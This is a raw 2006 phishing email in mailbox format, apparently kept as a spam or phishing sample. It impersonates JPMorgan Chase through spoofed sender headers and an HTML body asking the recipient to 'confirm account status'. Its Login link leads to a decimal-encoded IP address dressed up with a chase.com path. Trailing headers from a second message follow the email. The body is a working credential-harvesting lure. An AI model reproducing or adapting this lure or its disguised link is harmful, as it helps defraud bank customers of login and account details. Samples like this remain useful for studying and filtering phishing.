From: "Chase Security Service" <service@chase.com>
Reply-To: "Chase Security Service" <confirm@chase.com>
To: shidoshi@example.com, dros@example.com, dugsong@example.com,
	nobody@example.com, on@example.com, marius@example.com,
	owner-ceremony-digest@example.com
Subject: *** Security Issues ***
Date: Tue, 04 Apr 2006 18:24:06 +0400
X-Mailer: Microsoft Outlook Express 5.00.2919.6700
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="--91108724299081145"
X-Priority: 3
X-MSMail-Priority: Normal
Status: O
X-Status: 
X-Keywords:                  
X-UID: 733

----91108724299081145
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<FONT face=3DVerdana size=3D2>&nbsp;&nbsp;&nbsp;<IMG class=3D"gheader_logo=
_margin" height=3D"27" alt=3D"Chase" src=3D"http://www.chase.com/ccpmweb/s=
hared/image/chaseNewlogo.gif" width=3D"138" border=3D0><br><BR><div>&nbsp;=
&nbsp;&nbsp;Dear JPMorgan Chase Customer,<BR></div>&nbsp; 
<DIV>&nbsp;
<DIV>&nbsp;&nbsp; Due to recent fraudulent activities on some of JPMorgan =
Chase online <br>&nbsp;&nbsp;&nbsp;accounts we are launching a new securit=
y system to make<br>&nbsp;&nbsp;&nbsp;JPMorgan Chase online accounts more =
secure and safe. Before we can <br>&nbsp;&nbsp;&nbsp;activate it we will b=
e checking all JPMorgan Chase online accounts to confirm <br>&nbsp;&nbsp;&=
nbsp;the authenticity of the holder.</DIV>
<DIV><FONT color=3D#003399></FONT>&nbsp;</DIV>
<DIV><BR>&nbsp;&nbsp; We will require a confirmation that your account has=
 not been <br>&nbsp;&nbsp;&nbsp;stolen or hacked. Your account has not bee=
n suspended or frozen. </DIV>
<DIV>&nbsp;</DIV>
<DIV><BR>&nbsp;&nbsp; To confirm your account status please <A href=3D"htt=
p://1089151669/store/images/.chase.com/myaccounts.php">Login</A><BR><BR>&n=
bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-complete the required information to au=
thenticate and reset your account<BR><BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;-make sure your account balance has not been changed<BR><BR>&nbsp;&nbsp=
;&nbsp;&nbsp;&nbsp;&nbsp;-make sure your details have not been changed<BR>=
<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-review recent transactions in you=
r account history for any unauthorized <BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&=
nbsp;transfer</DIV>
<DIV>&nbsp;</DIV>
<DIV><BR>&nbsp;&nbsp;&nbsp;If you find any type of suspicious activities p=
lease contact us immediately.<br>&nbsp;&nbsp; Please include in your messa=
ge your account number, your account name<br>&nbsp;&nbsp; and the unauthor=
ized transfer date & time.<BR><BR></DIV>

<DIV>&nbsp;</DIV>
<DIV>&nbsp;&nbsp; Please do not reply to this message. For any inquiries, =
contact Customer Service.</DIV>
<DIV>&nbsp;</DIV>

<DIV>&nbsp;&nbsp; JPMorgan Chase Copyright =A9 2006</DIV></FONT>
<DIV>&nbsp;</DIV>




----91108724299081145--

From support@chaseonline.com  Tue Apr  4 14:24:02 2006
Return-Path: <support@chaseonline.com>
X-Original-To: nobody@login.example.com
Delivered-To: nobody@login.example.com
Received: from mail1.example.com (mail1.example.com [10.5.6.7])
	by naughty.example.com (Postfix) with ESMTP id F3E265370E7
	for <nobody@login.example.com>; Tue,  4 Apr 2006 14:24:01 -0400 (EDT)
Received: from 192.168.1.250 (12-219-252-106.client.mchsi.com [12.219.252.106])
	by mail1.example.com (Postfix) with SMTP id 011656CCD77
	for <nobody@example.com>; Tue,  4 Apr 2006 09:37:38 -0400 (EDT)
Received: from 44.152.97.172 by ; Tue, 04 Apr 2006 16:22:20 -0300
Message-ID: <QMNIXVVZJITUYRMFBJWOTMJNS@yahoo.com>
